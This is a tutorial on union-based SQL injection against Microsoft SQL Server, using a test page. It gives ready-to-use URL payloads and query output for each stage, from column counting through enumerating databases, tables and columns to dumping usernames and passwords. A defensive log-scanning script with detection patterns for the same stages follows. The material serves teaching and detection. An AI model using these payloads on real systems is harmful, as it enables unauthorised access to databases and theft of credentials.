0x00 Overview

Use this when the page has a display position, i.e. the query output is echoed back in the response.

0x01 Test data

  1> select * from article;
  2> go
  +----+-----------+-----------+
  | id | title     | content   |
  +----+-----------+-----------+
  | 1  | 测试标题  | 测试内容  |
  | 2  | 测试标题2 | 测试内容2 |
  +----+-----------+-----------+
  (2 rows affected)

  # Test table data: users
  sql server> select * from users;
  +----+--------------+----------+
  | id | username     | password |
  +----+--------------+----------+
  | 1  | test-user-01 | 123456   |
  | 2  | test-user-02 | 234567   |
  +----+--------------+----------+
  2 rows in set (0.00 sec)

  sql server> SELECT system_user;
  +--------+
  | field1 |
  +--------+
  | sa     |
  +--------+
  1 row in set (0.00 sec)

  sql server> select db_name();
  +--------+
  | field1 |
  +--------+
  | test   |
  +--------+
  1 row in set (0.00 sec)

0x02 Determining the column count

Web request: http://www.test.com/sql.php?id=1 order by 3

Database statement: select * from users where id=1 order by 3

  # When the column number is valid, the original row is returned
  +----+--------------+----------+
  | id | username     | password |
  +----+--------------+----------+
  | 1  | test-user-01 | 123456   |
  +----+--------------+----------+
  (1 rows affected)

  # When the column number is out of range
  sql server> select * from users where id=1 order by 4;
  42000 - [SQL Server]ORDER BY 位置号 4 超出了选择列表中项数的范围。

0x03 Dumping the current login user

Web request: http://www.test.com/sql.php?id=-1 union select system_user,null,null

Database statement: select * from users where id=-1 union select system_user,null,null

  1> select * from users where id=-1 union select system_user,null,null;
  +----+----------+----------+
  | id | username | password |
  +----+----------+----------+
  | sa | null     | null     |
  +----+----------+----------+
  (1 rows affected)

0x04 Dumping the current database

Web request: http://www.test.com/sql.php?id=-1 union select null,db_name(),null

Database statement: select * from users where id=-1 union select null,db_name(),null

  1> select * from users where id=-1 union select null,db_name(),null;
  +------+----------+----------+
  | id   | username | password |
  +------+----------+----------+
  | null | test     | null     |
  +------+----------+----------+
  (1 rows affected)

0x05 Dumping database names, method one

Note: changing the argument of db_name(N) returns the other database names.
For example:
db_name(1) returns database 1
db_name(2) returns database 2

Web request: http://www.test.com/sql.php?id=-1 union select null,db_name(1),null

Database statement: select * from users where id=-1 union select null,db_name(1),null

  # Get database 1
  1> select * from users where id=-1 union select null,db_name(1),null;
  +------+----------+----------+
  | id   | username | password |
  +------+----------+----------+
  | NULL | master   | NULL     |
  +------+----------+----------+
  (1 rows affected)

  # Get database 2
  1> select * from users where id=-1 union select null,db_name(2),null;
  +------+----------+----------+
  | id   | username | password |
  +------+----------+----------+
  | NULL | tempdb   | NULL     |
  +------+----------+----------+
  (1 rows affected)

0x06 Dumping database names, method two

Advantage: simple
Disadvantage: if the queried dbid happens not to exist, the query returns no data

To enumerate different databases, change the dbid predicate.
For example:
dbid>=1
dbid>=2

Web request: http://www.test.com/sql.php?id=-1 union select top 1 null,name,null from master.dbo.sysdatabases where dbid>=1

Database statement: select * from users where id=-1 union select top 1 null,name,null from master.dbo.sysdatabases where dbid>=1

  # Get database 1
  1> SELECT * FROM users WHERE id = -1
     UNION
     SELECT TOP 1 NULL, name, NULL
     FROM master.dbo.sysdatabases
     WHERE dbid >= 1;
  +------+----------+----------+
  | id   | username | password |
  +------+----------+----------+
  | NULL | master   | NULL     |
  +------+----------+----------+
  (1 rows affected)

  # Get database 2
  1> SELECT * FROM users WHERE id = -1
     UNION
     SELECT TOP 1 NULL, name, NULL
     FROM master.dbo.sysdatabases
     WHERE dbid >= 2;
  +------+----------+----------+
  | id   | username | password |
  +------+----------+----------+
  | NULL | tempdb   | NULL     |
  +------+----------+----------+
  (1 rows affected)

0x06 Dumping database names, method three

Advantage: every row_number value is guaranteed to be retrievable

Note:
the dbid inside OVER(Order by dbid) must be replaced with a column that actually exists in master.dbo.sysdatabases

To enumerate different databases, change the row_number predicate.
For example:
row_number>=1
row_number>=2

Web request: http://www.test.com/sql.php?id=-1 union select top 1 null,a.name,null from (select ROW_NUMBER() OVER(Order by dbid) AS row_number,name from master.dbo.sysdatabases) as a where row_number=1

Database statement: select * from users where id=-1 union select top 1 null,a.name,null from (select ROW_NUMBER() OVER(Order by dbid) AS row_number,name from master.dbo.sysdatabases) as a where row_number=1

  # Get database 1
  1> SELECT * FROM users WHERE id = -1
     UNION
     SELECT TOP 1 NULL, a.name, NULL
     FROM (
         SELECT ROW_NUMBER() OVER (ORDER BY dbid) AS row_number, name
         FROM master.dbo.sysdatabases
     ) AS a
     WHERE row_number = 1;
  +------+----------+----------+
  | id   | username | password |
  +------+----------+----------+
  | NULL | master   | NULL     |
  +------+----------+----------+
  (1 rows affected)

  # Get database 2
  1> SELECT * FROM users WHERE id = -1
     UNION
     SELECT TOP 1 NULL, a.name, NULL
     FROM (
         SELECT ROW_NUMBER() OVER (ORDER BY dbid) AS row_number, name
         FROM master.dbo.sysdatabases
     ) AS a
     WHERE row_number = 2;
  +------+----------+----------+
  | id   | username | password |
  +------+----------+----------+
  | NULL | tempdb   | NULL     |
  +------+----------+----------+
  (1 rows affected)

0x07 Dumping table names

Note:
the table_name inside OVER(Order by table_name) must be replaced with a column that actually exists in information_schema.tables

To target a different database, change the catalog filter.
For example:
table_catalog=db_name() (the current database)
table_catalog='name of the database to query'

To enumerate different tables, change the row_number predicate.
For example:
row_number>=1
row_number>=2

Web request: http://www.test.com/sql.php?id=-1 union select top 1 null,a.table_name,null from (select ROW_NUMBER() OVER(Order by table_name) AS row_number,table_name FROM information_schema.tables where table_catalog=db_name()) as a where row_number=1

Database statement: select * from users where id=-1 union select top 1 null,a.table_name,null from (select ROW_NUMBER() OVER(Order by table_name) AS row_number,table_name FROM information_schema.tables where table_catalog=db_name()) as a where row_number=1

  # Dump table 1
  1> SELECT * FROM users WHERE id = -1
     UNION
     SELECT TOP 1 NULL, a.table_name, NULL
     FROM (
         SELECT ROW_NUMBER() OVER (ORDER BY table_name) AS row_number, table_name
         FROM information_schema.tables
         WHERE table_catalog = db_name()
     ) AS a
     WHERE row_number = 1;
  2> go
  +------+----------+----------+
  | id   | username | password |
  +------+----------+----------+
  | NULL | article  | NULL     |
  +------+----------+----------+
  (1 rows affected)

  # Dump table 2
  1> SELECT * FROM users WHERE id = -1
     UNION
     SELECT TOP 1 NULL, a.table_name, NULL
     FROM (
         SELECT ROW_NUMBER() OVER (ORDER BY table_name) AS row_number, table_name
         FROM information_schema.tables
         WHERE table_catalog = db_name()
     ) AS a
     WHERE row_number = 2;
  2> go
  +------+----------+----------+
  | id   | username | password |
  +------+----------+----------+
  | NULL | users    | NULL     |
  +------+----------+----------+
  (1 rows affected)

0x08 Dumping column names

Note:
the column_name inside OVER(Order by column_name) must be replaced with a column that actually exists in information_schema.columns

To target a different table, change the table filter.
For example:
table_name='name of the table to query'

To enumerate different columns, change the row_number predicate.
For example:
row_number>=1
row_number>=2

Web request: http://www.test.com/sql.php?id=-1 union select top 1 null,a.column_name,null from (select ROW_NUMBER() OVER(Order by column_name) AS row_number,column_name from information_schema.columns where table_catalog=db_name() and table_name='users') as a where row_number=1

Database statement: select top 1 null,a.column_name,null from (select ROW_NUMBER() OVER(Order by column_name) AS row_number,column_name from information_schema.columns where table_catalog=db_name() and table_name='users') as a where row_number=1

  # Get the first column name of the users table in the current database
  1> SELECT TOP 1 NULL, a.column_name, NULL
     FROM (
         SELECT ROW_NUMBER() OVER (ORDER BY column_name) AS row_number, column_name
         FROM information_schema.columns
         WHERE table_catalog = db_name()
           AND table_name = 'users'
     ) AS a
     WHERE row_number = 1;
  2> go
  +------+-------------+------+
  |      | column_name |      |
  +------+-------------+------+
  | NULL | id          | NULL |
  +------+-------------+------+
  (1 rows affected)

  # Get the second column name of the users table in the current database
  1> SELECT TOP 1 NULL, a.column_name, NULL
     FROM (
         SELECT ROW_NUMBER() OVER (ORDER BY column_name) AS row_number, column_name
         FROM information_schema.columns
         WHERE table_catalog = db_name()
           AND table_name = 'users'
     ) AS a
     WHERE row_number = 2;
  2> go
  +------+-------------+------+
  |      | column_name |      |
  +------+-------------+------+
  | NULL | password    | NULL |
  +------+-------------+------+
  (1 rows affected)

0x09 Dumping row contents

Note:
the username inside OVER(Order by username) must be replaced with a column that actually exists in the users table

To enumerate different rows, change the row_number predicate.
For example:
row_number>=1
row_number>=2

Web request: http://www.test.com/sql.php?id=-1 union select a.id,a.username,a.password from (SELECT ROW_NUMBER () OVER (ORDER BY username) AS row_number,* from users) as a where row_number=1

Database statement: select * from users where id=-1 union select a.id,a.username,a.password from (SELECT ROW_NUMBER () OVER (ORDER BY username) AS row_number,* from users) as a where row_number=1

  # Query the first row of the users table
  1> SELECT * FROM users WHERE id = -1
     UNION
     SELECT a.id, a.username, a.password
     FROM (
         SELECT ROW_NUMBER() OVER (ORDER BY username) AS row_number, *
         FROM users
     ) AS a
     WHERE row_number = 1;
  2> go
  +----+--------------+----------+
  | id | username     | password |
  +----+--------------+----------+
  | 1  | test-user-01 | 123456   |
  +----+--------------+----------+
  (1 rows affected)

  # Query the second row of the users table
  1> SELECT * FROM users WHERE id = -1
     UNION
     SELECT a.id, a.username, a.password
     FROM (
         SELECT ROW_NUMBER() OVER (ORDER BY username) AS row_number, *
         FROM users
     ) AS a
     WHERE row_number = 2;
  2> go
  +----+--------------+----------+
  | id | username     | password |
  +----+--------------+----------+
  | 2  | test-user-02 | 234567   |
  +----+--------------+----------+
  (1 rows affected)
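As an added defender-side example (not part of the original write-up), the following Python script scans web-server access-log lines for the stages walked through above: ORDER BY column-count probing, UNION SELECT with NULL padding, the system_user/db_name() fingerprint, catalog enumeration via master.dbo.sysdatabases and information_schema, and the ROW_NUMBER() OVER walk. The log lines, client addresses, timestamps and rule names are constructed for the example; only one layer of URL decoding is applied, so other encodings are out of scope here.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache-style log lines modelled on this write-up's URLs (addresses and timestamps are made up).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /sql.php?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /sql.php?id=1%20order%20by%203 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /sql.php?id=1%20order%20by%204 HTTP/1.1" 500 87
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /sql.php?id=-1%20union%20select%20system_user,null,null HTTP/1.1" 200 300
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /sql.php?id=-1%20union%20select%20top%201%20null,a.name,null%20from%20(select%20ROW_NUMBER()%20OVER(Order%20by%20dbid)%20AS%20row_number,name%20from%20master.dbo.sysdatabases)%20as%20a%20where%20row_number=1 HTTP/1.1" 200 300
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /sql.php?id=2 HTTP/1.1" 200 520
"""
# One rule per stage of the union-based MSSQL technique; run against URL-decoded parameter values.
RULES = {
    "column_count_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_null_padding": re.compile(r"\bunion\s+(?:all\s+)?select\b.*\bnull\b", re.I | re.S),
    "mssql_fingerprint": re.compile(r"\b(?:system_user\b|db_name\s*\()", re.I),
    "mssql_catalog_enum": re.compile(r"\b(?:master\.dbo\.sysdatabases|information_schema\.(?:tables|columns))\b", re.I),
    "row_number_walk": re.compile(r"\brow_number\s*\(\s*\)\s*over\s*\(", re.I),
}
# Common Log Format request record: client, timestamp, request target and status code.
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def classify_value(value):
    """Names of every rule that matches one decoded parameter value."""
    return {name for name, rx in RULES.items() if rx.search(value)}

def scan_log(text):
    """Parse each request line, decode its query string once, and record per-line hits."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request record
        params = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        hits = {t for values in params.values() for v in values for t in classify_value(v)}
        if hits:
            findings.append({"ip": m["ip"], "ts": m["ts"], "status": int(m["status"]),
                             "params": sorted(params), "techniques": sorted(hits)})
    return findings

def chain_by_client(findings):
    """First-seen technique order per client, so probe -> union -> enumeration reads as one chain."""
    chains = {}
    for f in findings:
        seen = chains.setdefault(f["ip"], [])
        for t in f["techniques"]:
            if t not in seen:
                seen.append(t)
    return chains
```

Grouping hits per client is what makes the escalation visible: the failed ORDER BY 4 (HTTP 500) followed by UNION SELECT from the same address is a much stronger signal than any single line, and the 500 itself is the error-based feedback the page relies on, so suppressing verbose database errors removes that feedback.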